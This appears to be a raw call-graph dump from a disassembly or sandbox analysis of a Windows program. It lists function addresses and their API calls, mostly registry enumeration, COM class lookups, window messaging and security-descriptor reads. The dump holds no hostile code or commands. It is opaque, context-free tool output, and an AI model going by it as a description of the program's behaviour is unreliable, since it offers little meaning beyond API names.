6568->6569 6570 67d71a RegQueryValueExW RegCloseKey 6568->6570 6571 67f3a0 6569->6571 6570->6569 6572 67f3ab 6571->6572 6573 67f3a8 6571->6573 6576 67f4cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6572->6576 6573->6539 6575 67f602 6575->6539 6576->6575 6578 67d67d 9 API calls 6577->6578 6579 67d34e wsprintfW 6578->6579 6580 67d384 6579->6580 6581 67d370 lstrcatW lstrcatW 6579->6581 6582 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 6580->6582 6581->6580 6583 67d393 6582->6583 6583->6543 6584 66fc60 6585 66fc7d #4435 6584->6585 6587 66dba0 6588 66dbc4 6587->6588 6589 66e15d 6587->6589 6590 66dbd3 #6195 #1143 LoadIconW SendMessageW #6195 6588->6590 6591 66dc21 #1662 lstrcmpW 6588->6591 6592 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 6589->6592 6682 66e409 SendMessageW 6590->6682 6595 66dc41 #6195 #6195 #1143 LoadIconW SendMessageW 6591->6595 6596 66dc9d memcmp 6591->6596 6593 66e16a 6592->6593 6687 679b32 6595->6687 6599 66dcbe 6596->6599 6600 66de59 StringFromGUID2 #6195 #6195 6596->6600 6604 66dce1 #6195 6599->6604 6605 66dccf #6195 6599->6605 6601 66deb0 6600->6601 6602 66de90 6600->6602 6609 66deb5 6601->6609 6610 66ded2 6601->6610 6607 679b32 219 API calls 6602->6607 6606 66dcef #1143 LoadIconW SendMessageW #6195 6604->6606 6605->6606 6611 66dda6 6606->6611 6612 66dd32 RegOpenKeyExW 6606->6612 6615 66de9b 6607->6615 6617 679b32 219 API calls 6609->6617 6613 66def7 6610->6613 6614 66ded7 6610->6614 6623 66dde7 6611->6623 6624 66ddab 6611->6624 6618 66dd92 6612->6618 6619 66dd53 #6195 #1143 LoadIconW SendMessageW RegCloseKey 6612->6619 6621 66df00 6613->6621 6667 66e113 6613->6667 6620 679b32 219 API calls 6614->6620 6622 66e466 18 API calls 6615->6622 6626 66dec0 6617->6626 6628 679b32 219 API calls 6618->6628 6619->6618 6627 66dee2 6620->6627 6638 679b32 219 API calls 6621->6638 6621->6667 6630 66dea2 #1143 LoadIconW 6622->6630 6633 66e409 10 API calls 6623->6633 6631 679b32 219 API calls 6624->6631 6625 66e156 #2644 6625->6589 6632 66e466 18 API calls 6626->6632 6635 66e466 18 API calls 6627->6635 6636 66dd9d 6628->6636 6629 679b32 219 API calls 6637 66e129 6629->6637 6668 66e10f SendMessageW 6630->6668 6640 66ddb6 6631->6640 6632->6630 6634 66ddee lstrcmpW 6633->6634 6641 66de06 #1143 LoadIconW SendMessageW 6634->6641 6642 66de2b lstrcmpW 6634->6642 6635->6630 6643 66e466 18 API calls 6636->6643 6644 66e466 18 API calls 6637->6644 6645 66df14 6638->6645 6646 66e466 18 API calls 6640->6646 6641->6642 6642->6625 6647 66de41 #1143 LoadIconW 6642->6647 6648 66dda4 6643->6648 6644->6630 6898 66c6a6 LoadCursorW SetCursor 6645->6898 6651 66ddbd #1143 LoadIconW SendMessageW 6646->6651 6647->6668 6648->6634 6651->6634 6652 66df2b 6901 670b66 LoadCursorW SetCursor 6652->6901 6654 66df45 6655 66f616 124 API calls 6654->6655 6656 66df5f 6655->6656 6904 66cb16 6656->6904 6661 66dfc5 RegQueryValueW 6662 66dff6 6661->6662 6663 66e079 6661->6663 6670 66e057 #1165 ExtractIconW 6662->6670 6671 66e029 lstrcpyW wcsrchr 6662->6671 6957 66d944 RegQueryValueW 6663->6957 6666 66e0fe RegCloseKey 6666->6667 6666->6668 6667->6629 6668->6625 6669 66d944 10 API calls 6672 66e0a0 6669->6672 6670->6663 6670->6666 6671->6670 6673 66e052 6671->6673 6672->6666 6674 66d944 10 API calls 6672->6674 6673->6670 6675 66e0b7 6674->6675 6675->6666 6676 66d944 10 API calls 6675->6676 6677 66e0ce 6676->6677 6677->6666 6678 66d944 10 API calls 6677->6678 6679 66e0e5 6678->6679 6679->6666 6680 66d944 10 API calls 6679->6680 6681 66e0fc 6680->6681 6681->6666 6683 66dc1c 6682->6683 6684 66e428 SendMessageW 6682->6684 6683->6589 6966 66e583 6684->6966 6979 67f6e0 6687->6979 6691 679bb0 lstrcmpW 6692 679bc2 RegOpenKeyExW 6691->6692 6693 679c2f 6691->6693 6696 679be4 #538 6692->6696 6697 679c29 SendMessageW #2644 6692->6697 6694 679dc2 6693->6694 6695 679c3b wsprintfW 6693->6695 6701 679e5b StringFromGUID2 6694->6701 6705 679de9 6694->6705 7009 67de06 6695->7009 6982 679634 6696->6982 6703 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 6697->6703 6709 67a070 6701->6709 6710 679e9f RegOpenKeyExW 6701->6710 6708 66dc91 6703->6708 6704 679c0e #800 RegCloseKey 6704->6697 6705->6697 6711 679df2 RegOpenKeyExW 6705->6711 6706 679cef 6717 679cfe #800 6706->6717 6718 679d0c 6706->6718 6707 679c9e #538 #538 7013 679419 6707->7013 6886 66e466 SendMessageW 6708->6886 6714 67a264 6709->6714 6715 67a079 RegOpenKeyExW 6709->6715 6710->6697 6713 679ec5 RegQueryValueExW 6710->6713 6711->6697 6716 679e19 #538 6711->6716 6719 679f21 wsprintfW 6713->6719 6720 679efe wsprintfW 6713->6720 6722 67ab18 RegOpenKeyExW 6714->6722 6723 67a275 RegQueryValueW wsprintfW 6714->6723 6715->6697 6721 67a09f RegQueryValueExW 6715->6721 6724 679634 30 API calls 6716->6724 6717->6718 6725 679d15 #800 6718->6725 6726 679d20 SendMessageW wsprintfW RegOpenKeyExW 6718->6726 6727 679f3b 6719->6727 6720->6727 6728 67a0f7 wsprintfW 6721->6728 6729 67a0d8 wsprintfW 6721->6729 6722->6697 6730 67ab3e RegQueryValueExW wsprintfW 6722->6730 6731 67de06 2 API calls 6723->6731 6732 679e47 #800 6724->6732 6725->6726 6726->6697 6733 679d82 #538 6726->6733 6734 67de06 2 API calls 6727->6734 6735 67a10d 6728->6735 6729->6735 6736 67de06 2 API calls 6730->6736 6739 67a2d8 6731->6739 6740 67b33d RegCloseKey 6732->6740 6741 679634 30 API calls 6733->6741 6742 679f4e 6734->6742 6737 67de06 2 API calls 6735->6737 6738 67ab9f 6736->6738 6743 67a120 6737->6743 6744 67abb3 #538 #538 6738->6744 6745 67ac0e 6738->6745 6746 67a34d 6739->6746 6747 67a2ec #538 #538 6739->6747 6740->6697 6748 679dae #800 6741->6748 6749 679f60 #538 #538 6742->6749 6750 679fb9 6742->6750 6752 67a182 6743->6752 6753 67a132 #538 #538 6743->6753 6754 679419 6 API calls 6744->6754 6761 67ac2d 6745->6761 6762 67ac1c #800 6745->6762 6763 67a376 6746->6763 6764 67a35f #800 6746->6764 6755 679419 6 API calls 6747->6755 6756 67b329 6748->6756 6751 679419 6 API calls 6749->6751 6759 679fd6 6750->6759 6760 679fc8 #800 6750->6760 6751->6750 6767 67a191 #800 6752->6767 6768 67a19f 6752->6768 6758 679419 6 API calls 6753->6758 6754->6745 6755->6746 6757 67b32a SendMessageW 6756->6757 6757->6740 6758->6752 6765 679fdf #800 6759->6765 6766 679fea SendMessageW RegCloseKey wsprintfW RegOpenKeyExW 6759->6766 6760->6759 6769 67ac36 #800 6761->6769 6770 67ac44 SendMessageW RegCloseKey wsprintfW RegOpenKeyExW 6761->6770 6762->6761 6771 67a382 #800 6763->6771 6772 67a399 SendMessageW wsprintfW RegOpenKeyExW 6763->6772 6764->6763 6765->6766 6766->6697 6773 67a052 #538 6766->6773 6767->6768 6774 67a1b3 SendMessageW RegCloseKey wsprintfW RegOpenKeyExW 6768->6774 6775 67a1a8 #800 6768->6775 6769->6770 6770->6697 6776 67acb0 #538 6770->6776 6771->6772 6772->6697 6777 67a3f9 #538 6772->6777 6773->6709 6774->6697 6778 67a21f #538 6774->6778 6775->6774 6779 679634 30 API calls 6776->6779 6780 679634 30 API calls 6777->6780 6781 679634 30 API calls 6778->6781 6782 67ace5 #800 SendMessageW RegQueryValueW 6779->6782 6783 67a42f #800 SendMessageW 6780->6783 6784 67a24f #800 6781->6784 6785 67ae02 RegQueryValueW 6782->6785 6786 67ad3e 6782->6786 7017 67d057 6783->7017 6784->6757 6788 67ae56 RegQueryValueW wsprintfW 6785->6788 6789 67ae2f RegQueryValueW 6785->6789 6786->6785 6790 67ad4b #537 #925 RegOpenKeyExW #800 #800 6786->6790 6793 67de06 2 API calls 6788->6793 6789->6788 6792 67b12a RegQueryValueW 6789->6792 6794 67adfd 6790->6794 6795 67adad #538 6790->6795 6792->6740 6797 67b15c RegQueryValueW wsprintfW 6792->6797 6800 67aeb4 6793->6800 6794->6785 6796 679634 30 API calls 6795->6796 6801 67ade2 #800 RegCloseKey 6796->6801 6802 67de06 2 API calls 6797->6802 6798 67d2f7 12 API calls 6803 67a48e RegOpenKeyExW 6798->6803 6799 67a657 6804 67a662 RegQueryValueW 6799->6804 6805 67af26 6800->6805 6806 67aec8 #538 #538 6800->6806 6801->6794 6807 67b1b4 6802->6807 6803->6799 6808 67a4b7 6803->6808 6809 67a68f 6804->6809 6810 67a69d 6804->6810 6817 67af49 6805->6817 6818 67af38 #800 6805->6818 6811 679419 6 API calls 6806->6811 6812 67b222 6807->6812 6813 67b1c8 #538 #538 6807->6813 6814 67de06 2 API calls 6808->6814 6815 67a720 wsprintfW RegOpenKeyExW 6809->6815 6810->6815 6816 67a6a7 RegOpenKeyExW 6810->6816 6811->6805 6830 67b245 6812->6830 6831 67b234 #800 6812->6831 6819 679419 6 API calls 6813->6819 6820 67a4d3 6814->6820 6822 67a8f1 RegQueryValueW 6815->6822 6823 67a760 RegQueryValueW wsprintfW 6815->6823 6816->6815 6821 67a6c7 #538 6816->6821 6824 67af66 SendMessageW RegOpenKeyExW 6817->6824 6825 67af55 #800 6817->6825 6818->6817 6819->6812 6828 67a4e7 #538 #538 6820->6828 6829 67a543 6820->6829 6832 679634 30 API calls 6821->6832 6833 67a923 wsprintfW RegOpenKeyExW 6822->6833 6834 67aaee RegCloseKey SendMessageW 6822->6834 6835 67de06 2 API calls 6823->6835 6826 67b111 SendMessageW 6824->6826 6827 67afa8 RegQueryValueW 6824->6827 6825->6824 6826->6792 6837 67afd6 RegOpenKeyExW 6827->6837 6838 67b04b RegQueryValueW 6827->6838 6839 679419 6 API calls 6828->6839 6850 67a555 #800 6829->6850 6851 67a56c 6829->6851 6840 67b251 #800 6830->6840 6841 67b25c 6 API calls 6830->6841 6831->6830 6842 67a705 #800 RegCloseKey 6832->6842 6833->6834 6843 67a967 RegQueryValueW wsprintfW 6833->6843 6834->6697 6836 67a7c6 6835->6836 6844 67a7dc #538 #538 6836->6844 6845 67a836 6836->6845 6846 67b03f RegCloseKey 6837->6846 6847 67affb #538 6837->6847 6848 67b105 RegCloseKey 6838->6848 6849 67b078 lstrcmpiW 6838->6849 6839->6829 6840->6841 6841->6756 6852 67b2de #538 6841->6852 6842->6815 6853 67de06 2 API calls 6843->6853 6855 679419 6 API calls 6844->6855 6865 67a859 6845->6865 6866 67a848 #800 6845->6866 6846->6838 6856 679634 30 API calls 6847->6856 6848->6826 6849->6848 6857 67b090 RegOpenKeyExW 6849->6857 6850->6851 6858 67a58f SendMessageW 6851->6858 6859 67a578 #800 6851->6859 6860 679634 30 API calls 6852->6860 6854 67a9c9 6853->6854 6862 67a9df #538 #537 6854->6862 6863 67aa39 6854->6863 6855->6845 6864 67b030 #800 6856->6864 6867 67b0b5 #538 6857->6867 6868 67b0f9 RegCloseKey 6857->6868 6861 67d67d 9 API calls 6858->6861 6859->6858 6869 67b30e #800 RegCloseKey 6860->6869 6870 67a5e3 #538 6861->6870 6871 679419 6 API calls 6862->6871 6876 67aa5c 6863->6876 6877 67aa4b #800 6863->6877 6864->6846 6872 67a876 SendMessageW #538 6865->6872 6873 67a865 #800 6865->6873 6866->6865 6874 679634 30 API calls 6867->6874 6868->6848 6869->6756 6875 679634 30 API calls 6870->6875 6871->6863 6878 679634 30 API calls 6872->6878 6873->6872 6879 67b0ea #800 6874->6879 6880 67a615 #800 SendMessageW RegCloseKey 6875->6880 6881 67aa73 SendMessageW #538 6876->6881 6882 67aa68 #800 6876->6882 6877->6876 6883 67a8c2 #800 SendMessageW RegCloseKey 6878->6883 6879->6868 6880->6804 6884 679634 30 API calls 6881->6884 6882->6881 6883->6822 6885 67aabf #800 SendMessageW RegCloseKey 6884->6885 6885->6834 6887 66e493 #6211 SendMessageW SendMessageW 6886->6887 6888 66dc98 6886->6888 6889 66e583 6 API calls 6887->6889 6888->6625 6890 66e4cc 6889->6890 6891 66e4e0 SendMessageW 6890->6891 6892 66e4ce SendMessageW 6891->6892 6893 66e4f8 SendMessageW 6891->6893 6892->6891 6894 66e52e SendMessageW 6893->6894 6895 66e50e SendMessageW 6893->6895 6896 66e583 6 API calls 6894->6896 6895->6894 6897 66e54b SendMessageW RedrawWindow RedrawWindow 6896->6897 6897->6888 7029 66c6f3 SendMessageW 6898->7029 7078 670bbb SendMessageW 6901->7078 7088 67f415 6904->7088 6906 66cb25 #540 StringFromGUID2 6907 67d605 12 API calls 6906->6907 6908 66cb98 6907->6908 6909 67d605 12 API calls 6908->6909 6910 66cbd6 #861 6909->6910 6912 67d605 12 API calls 6910->6912 6913 66cc2d 6912->6913 6914 66cc31 lstrcmpW 6913->6914 6915 66cc79 #2634 #6195 6913->6915 6917 66cc62 #6195 #2634 6914->6917 6918 66cc49 #6195 #2634 6914->6918 6916 66cc8e 6915->6916 6919 66cc92 SendMessageW #6330 #800 6916->6919 6917->6916 6918->6919 6920 67f3c4 4 API calls 6919->6920 6921 66ccc1 6920->6921 6922 66e1a4 6921->6922 7089 67d4cd GetVersionExW 6922->7089 6925 66e1cd SendMessageW SendMessageW 7092 67db15 6925->7092 6927 66e1c1 6928 66e466 18 API calls 6927->6928 6930 66df80 wsprintfW RegOpenKeyExW 6928->6930 6930->6625 6930->6661 6931 66e228 6933 67db15 3 API calls 6931->6933 6932 66e210 SendMessageW 6932->6930 6932->6931 6934 66e22d 6933->6934 6935 66e251 #6211 SendMessageW SendMessageW 6934->6935 6936 66e239 SendMessageW 6934->6936 6937 66e2b4 SendMessageW 6935->6937 6938 66e281 SendMessageW 6935->6938 6936->6930 6936->6935 6939 66e2c7 SendMessageW 6937->6939 6940 66e2e4 6937->6940 6938->6937 6941 66e298 SendMessageW 6938->6941 6939->6940 6942 67db15 3 API calls 6940->6942 6943 66e583 6 API calls 6941->6943 6944 66e2e9 6942->6944 6943->6937 6945 66e391 6944->6945 6946 67d4cd 5 API calls 6944->6946 6947 66e396 SendMessageW SendMessageW SendMessageW 6945->6947 6949 66e2f6 6946->6949 6948 66e583 6 API calls 6947->6948 6950 66e3e0 SendMessageW RedrawWindow 6948->6950 6951 66e2ff SendMessageW SendMessageW 6949->6951 6952 66e32c 6949->6952 6950->6930 6951->6952 6953 67d4cd 5 API calls 6952->6953 6954 66e331 6953->6954 6955 66e335 SendMessageW SendMessageW 6954->6955 6956 66e362 SendMessageW SendMessageW 6954->6956 6955->6956 6956->6947 6958 66d983 lstrlenW 6957->6958 6959 66d9fb 6957->6959 6960 66d99b 6958->6960 6963 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 6959->6963 6961 66d9b3 lstrcpyW wcsrchr 6960->6961 6962 66d9e0 #1165 ExtractIconW 6960->6962 6961->6962 6964 66d9db 6961->6964 6962->6959 6965 66da08 6963->6965 6964->6962 6965->6666 6965->6669 6967 66e648 #6211 6966->6967 6968 66e599 6966->6968 6969 66e444 SendMessageW #6211 6967->6969 6975 66e5cd RedrawWindow 6967->6975 6970 66e625 #6211 6968->6970 6971 66e5a2 6968->6971 6969->6683 6970->6969 6970->6975 6973 66e5a7 6971->6973 6974 66e602 #6211 6971->6974 6976 66e5df #6211 6973->6976 6977 66e5ac 6973->6977 6974->6969 6974->6975 6975->6969 6976->6969 6976->6975 6977->6969 6978 66e5b5 #6211 6977->6978 6978->6969 6978->6975 6980 679b4f #1662 SendMessageW 6979->6980 6981 67559e SendMessageW 6980->6981 6981->6691 7022 67f3e2 6982->7022 6984 679643 RegQueryInfoKeyW 6985 679678 6984->6985 6988 6796b8 6984->6988 6986 679758 RegEnumValueW 6985->6986 6985->6988 6998 6797ad 6986->6998 6987 679946 lstrcpyW 6987->6998 6988->6704 6989 6798fc lstrcpyW 6989->6998 6990 67de06 2 API calls 6990->6998 6991 67987a memset 6991->6998 6992 679862 wsprintfW 6992->6998 6993 679979 #538 #538 7023 6793af 6993->7023 6994 679930 wsprintfW 6994->6998 6995 679843 wsprintfW 6995->6998 6997 679a57 6997->6988 7004 679b15 RegEnumKeyW 6997->7004 6998->6987 6998->6989 6998->6990 6998->6991 6998->6992 6998->6993 6998->6994 6998->6995 6998->6997 6999 6799cd #800 6998->6999 7000 6799e6 #800 6998->7000 7001 679922 wsprintfW 6998->7001 7002 6798c2 _itow 6998->7002 7003 6799fa SendMessageW RegEnumValueW 6998->7003 6999->6998 7000->6998 7001->6998 7002->6998 7003->6998 7004->6988 7005 679aa6 RegOpenKeyExW 7004->7005 7005->6997 7006 679abe #538 7005->7006 7007 679634 8 API calls 7006->7007 7008 679ae0 #800 SendMessageW RegCloseKey 7007->7008 7008->6997 7010 67de1b malloc 7009->7010 7011 67de0e _callnewh 7010->7011 7012 679c8a 7010->7012 7011->7010 7011->7012 7012->6706 7012->6707 7028 67f3e2 7013->7028 7015 679425 6 API calls 7016 679482 7015->7016 7016->6706 7018 67d67d 9 API calls 7017->7018 7019 67d0a1 7018->7019 7020 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7019->7020 7021 67a466 7020->7021 7021->6798 7021->6799 7022->6984 7027 67f3e2 7023->7027 7025 6793bb 6 API calls 7026 679416 7025->7026 7026->6998 7027->7025 7028->7015 7030 67d2f7 12 API calls 7029->7030 7031 66c745 7030->7031 7039 67c0bc 7031->7039 7034 66c7a5 SendMessageW SendMessageW 7036 66c7c1 #2634 #2634 7034->7036 7035 66c78a SendMessageW SendMessageW 7035->7036 7037 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7036->7037 7038 66c6d9 LoadCursorW SetCursor 7037->7038 7038->6652 7077 67f415 7039->7077 7041 67c0cb #540 RegOpenKeyExW 7042 67c157 7041->7042 7043 67c11e RegQueryValueExW 7041->7043 7046 67c159 #800 7042->7046 7044 67c146 7043->7044 7045 67c16e malloc 7043->7045 7044->7045 7047 67c14b RegCloseKey 7044->7047 7049 67c187 RegCloseKey 7045->7049 7050 67c198 RegQueryValueExW RegCloseKey 7045->7050 7048 67f3c4 4 API calls 7046->7048 7047->7042 7053 66c76e 7048->7053 7049->7042 7051 67c1d6 GetSecurityDescriptorDacl 7050->7051 7052 67c1cc free 7050->7052 7054 67c1f6 GetLastError 7051->7054 7055 67c203 7051->7055 7052->7042 7053->7034 7053->7035 7054->7042 7056 67c210 #2810 SendMessageW 7055->7056 7057 67c2dd GetAce 7055->7057 7058 67c2d0 free 7056->7058 7059 67c25b SendMessageW SendMessageW SendMessageW 7056->7059 7060 67c5ac GetLastError 7057->7060 7061 67c2f9 7057->7061 7058->7046 7059->7058 7062 67c31c LookupAccountSidW 7061->7062 7063 67c571 #3993 7061->7063 7064 67c449 LookupAccountSidW 7061->7064 7065 67c37e #2810 7062->7065 7066 67c35a #2810 7062->7066 7069 67c584 GetAce 7063->7069 7067 67c487 #2810 7064->7067 7068 67c4ab #2810 7064->7068 7070 67c391 SendMessageW 7065->7070 7066->7070 7071 67c4be SendMessageW 7067->7071 7068->7071 7069->7061 7072 67c5a6 7069->7072 7070->7069 7073 67c3cd SendMessageW SendMessageW 7070->7073 7071->7069 7074 67c4fa SendMessageW SendMessageW 7071->7074 7072->7060 7075 67c43c 7073->7075 7076 67c559 SendMessageW 7073->7076 7074->7075 7075->7076 7076->7069 7077->7041 7079 67d2f7 12 API calls 7078->7079 7080 670c07 7079->7080 7081 67c0bc 39 API calls 7080->7081 7082 670c2a 7081->7082 7083 670c5f SendMessageW SendMessageW UpdateWindow #2634 #2634 7082->7083 7084 670c2e #2634 SendMessageW SendMessageW 7082->7084 7085 670ca8 7083->7085 7084->7085 7086 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7085->7086 7087 670b99 #6330 LoadCursorW SetCursor 7086->7087 7087->6654 7088->6906 7090 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7089->7090 7091 66e1b4 7090->7091 7091->6925 7091->6927 7093 67db1e LoadLibraryW 7092->7093 7094 66e204 7092->7094 7095 67db37 GetProcAddress 7093->7095 7096 67db58 7093->7096 7094->6931 7094->6932 7097 67db47 7095->7097 7098 67db51 FreeLibrary 7095->7098 7096->7094 7097->7098 7098->7096 7099 673a60 7100 673a96 7099->7100 7101 673ac5 7099->7101 7100->7101 7102 673aca #1662 7100->7102 7103 673adc 7102->7103 7127 66e18b SendMessageW 7103->7127 7105 673ae3 7106 673b01 7105->7106 7107 673af1 7105->7107 7109 673b0f 7106->7109 7110 673b1c 7106->7110 7159 67693c 7107->7159 7176 675601 RegOpenKeyW 7109->7176 7112 673b37 7110->7112 7113 673b2a 7110->7113 7115 673b45 7112->7115 7116 673b52 7112->7116 7194 6773b0 RegOpenKeyW 7113->7194 7128 67642d CoCreateInstance 7115->7128 7119 673b87 7116->7119 7120 673b58 7116->7120 7117 673b50 7158 66e18b SendMessageW 7117->7158 7258 67591d 7119->7258 7120->7119 7121 673b61 7120->7121 7220 676c29 7121->7220 7125 673ba3 #2644 7125->7101 7126 673afc 7126->7117 7127->7105 7129 6764dc GetUserDefaultLCID 7128->7129 7130 676738 RegOpenKeyW 7128->7130 7148 676514 7129->7148 7131 67675e RegEnumKeyW 7130->7131 7141 6766e1 7130->7141 7134 676917 RegCloseKey 7131->7134 7135 676797 RegOpenKeyW 7131->7135 7133 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7136 676938 7133->7136 7134->7141 7137 676912 7135->7137 7138 6767b9 RegQueryValueExW 7135->7138 7136->7117 7137->7117 7139 676906 RegCloseKey 7138->7139 7140 6767ee 7138->7140 7139->7137 7142 676800 wsprintfW 7140->7142 7143 67681c 7140->7143 7141->7133 7142->7143 7144 66b3d0 2 API calls 7143->7144 7145 676826 7144->7145 7146 676847 7145->7146 7147 673e89 2 API calls 7145->7147 7150 677a11 41 API calls 7146->7150 7147->7146 7148->7141 7149 676579 StringFromGUID2 7148->7149 7314 66b3d0 7148->7314 7317 677a11 7148->7317 7361 673e89 7148->7361 7364 677f0b SendMessageW 7148->7364 7149->7148 7151 6765b5 wsprintfW 7149->7151 7152 676891 7150->7152 7151->7148 7365 677f0b SendMessageW 7152->7365 7158->7125 7160 676c10 7159->7160 7161 67698b RegOpenKeyW 7159->7161 7162 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7160->7162 7161->7160 7172 6769ee 7161->7172 7164 676c25 7162->7164 7163 676a04 RegEnumKeyW 7165 676a27 RegQueryValueW 7163->7165 7166 676c04 RegCloseKey 7163->7166 7164->7126 7167 676bff 7165->7167 7165->7172 7166->7160 7167->7166 7168 676a6c wsprintfW 7168->7172 7169 66b3d0 2 API calls 7169->7172 7170 673e89 2 API calls 7170->7172 7171 676ae9 7173 676b11 CLSIDFromString 7171->7173 7174 676b29 7171->7174 7172->7163 7172->7168 7172->7169 7172->7170 7172->7171 7173->7174 7372 677f0b SendMessageW 7174->7372 7177 675904 7176->7177 7184 675661 7176->7184 7178 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7177->7178 7180 675919 7178->7180 7179 675681 RegEnumKeyW 7181 6758f8 RegCloseKey 7179->7181 7179->7184 7180->7126 7181->7177 7182 6758f3 7182->7181 7183 66b3d0 2 API calls 7183->7184 7184->7179 7184->7182 7184->7183 7185 673e89 2 API calls 7184->7185 7186 675737 wsprintfW RegQueryValueW 7184->7186 7185->7184 7187 6757b0 7186->7187 7188 6757bf CLSIDFromString 7187->7188 7192 6757d7 7187->7192 7189 675837 lstrcpyW lstrlenW 7188->7189 7190 6758b2 wsprintfW 7189->7190 7191 6758ce 7189->7191 7190->7191 7373 677f0b SendMessageW 7191->7373 7192->7189 7195 677410 RegEnumKeyW 7194->7195 7196 67775a 7194->7196 7200 67774e RegCloseKey 7195->7200 7201 677449 RegOpenKeyW 7195->7201 7197 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7196->7197 7199 67776f 7197->7199 7199->7126 7200->7196 7202 677749 7201->7202 7210 67746b 7201->7210 7202->7200 7203 677481 RegEnumKeyW 7204 6774a4 RegQueryValueW 7203->7204 7205 67773d RegCloseKey 7203->7205 7206 677738 7204->7206 7204->7210 7205->7202 7206->7205 7207 66b3d0 2 API calls 7207->7210 7208 673e89 2 API calls 7208->7210 7209 677538 7211 677560 CLSIDFromString 7209->7211 7218 677578 7209->7218 7210->7203 7210->7207 7210->7208 7210->7209 7212 6775d8 wcstol wcsrchr 7211->7212 7213 677665 7212->7213 7214 677643 wcstol 7212->7214 7215 677683 wsprintfW 7213->7215 7216 67769f wsprintfW 7213->7216 7214->7213 7215->7216 7217 677731 7216->7217 7374 677f0b SendMessageW 7217->7374 7218->7212 7221 676c90 7220->7221 7222 676cb2 7220->7222 7223 676cbd 7221->7223 7224 676c9c 7221->7224 7232 676d47 7222->7232 7427 6778fa SendMessageW 7222->7427 7394 674899 #1662 #540 7223->7394 7375 675010 7224->7375 7229 676ceb #540 7415 66b3f4 7229->7415 7230 676d7d 7428 679230 SendMessageW 7230->7428 7236 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7232->7236 7233 676d08 #2810 7416 67d91d 7233->7416 7239 6773ac 7236->7239 7237 676db9 RegOpenKeyW 7237->7232 7241 676e2d malloc 7237->7241 7238 676d2f #800 7238->7222 7239->7126 7244 676e99 7241->7244 7246 676e8d 7241->7246 7242 677351 RegCloseKey 7242->7232 7243 676eb8 malloc 7243->7244 7243->7246 7244->7243 7256 676ef2 7244->7256 7246->7242 7247 677344 free 7246->7247 7248 677328 free 7246->7248 7247->7242 7248->7246 7249 676f23 RegEnumKeyW 7249->7256 7250 676f5d CLSIDFromString 7250->7256 7251 67712c StringFromGUID2 7251->7256 7252 67716e lstrcpyW RegQueryValueW 7252->7256 7253 6771c6 wsprintfW 7253->7256 7254 66b3d0 2 API calls 7254->7256 7255 673e89 2 API calls 7255->7256 7256->7246 7256->7249 7256->7250 7256->7251 7256->7252 7256->7253 7256->7254 7256->7255 7429 677f0b SendMessageW 7256->7429 7259 675f52 RegOpenKeyW 7258->7259 7260 6759a8 7258->7260 7271 675f71 7259->7271 7280 67637d 7259->7280 7260->7259 7261 6759c4 StringFromGUID2 7260->7261 7446 66b696 7261->7446 7263 675f87 RegEnumKeyW 7265 676371 RegCloseKey 7263->7265 7263->7271 7264 6759e3 lstrcpyW CoCreateInstance 7266 675f10 #538 7264->7266 7278 675a26 7264->7278 7265->7280 7269 67d91d 17 API calls 7266->7269 7267 67600c 7272 66b3d0 2 API calls 7267->7272 7268 675fba wsprintfW RegOpenKeyW 7270 676000 RegCloseKey 7268->7270 7268->7271 7273 675f39 #800 7269->7273 7270->7267 7271->7263 7271->7267 7271->7268 7274 676016 7272->7274 7273->7259 7275 676037 7274->7275 7276 673e89 2 API calls 7274->7276 7277 677a11 41 API calls 7275->7277 7276->7275 7286 676074 7277->7286 7279 675e13 #538 7278->7279 7302 675ae3 7278->7302 7281 67d91d 17 API calls 7279->7281 7307 675edf 7280->7307 7450 6791ad ResumeThread 7280->7450 7282 675e3c #800 7281->7282 7303 675e11 7282->7303 7283 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7285 676429 7283->7285 7285->7117 7287 6761d0 7286->7287 7289 67f604 4 API calls 7286->7289 7306 676303 7286->7306 7288 6761d7 RegQueryValueW 7287->7288 7290 67620c 7288->7290 7291 67623a 7288->7291 7289->7288 7290->7291 7293 67621e wsprintfW 7290->7293 7449 677f0b SendMessageW 7291->7449 7292 66b3d0 2 API calls 7292->7302 7293->7291 7295 673e89 2 API calls 7295->7302 7296 675b69 StringFromGUID2 7296->7302 7297 677a11 41 API calls 7297->7302 7298 676292 7301 6762d7 #1083 7298->7301 7298->7306 7299 675bf4 #537 7299->7302 7300 67f604 4 API calls 7300->7299 7301->7306 7302->7292 7302->7295 7302->7296 7302->7297 7302->7299 7302->7300 7302->7303 7304 675c45 #925 7302->7304 7308 675c99 RegQueryValueW 7302->7308 7309 675cec #800 7302->7309 7310 675d0d #800 7302->7310 7311 675d2a wsprintfW 7302->7311 7313 675dd4 #1083 7302->7313 7447 677f0b SendMessageW 7302->7447 7303->7307 7448 6791ad ResumeThread 7303->7448 7304->7302 7306->7265 7307->7283 7308->7302 7309->7302 7310->7302 7311->7302 7313->7302 7315 67de06 2 API calls 7314->7315 7316 66b3dd 7315->7316 7316->7148 7318 677a47 CLSIDFromString 7317->7318 7319 677a40 7317->7319 7318->7319 7320 677a70 wsprintfW RegOpenKeyW 7318->7320 7321 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 7319->7321 7320->7319 7322 677ab6 7320->7322 7324 677f07 7321->7324 7366 6779b1 RegOpenKeyW 7322->7366 7324->7148 7327 677b1d _wcsnicmp 7329 677ba6 7327->7329 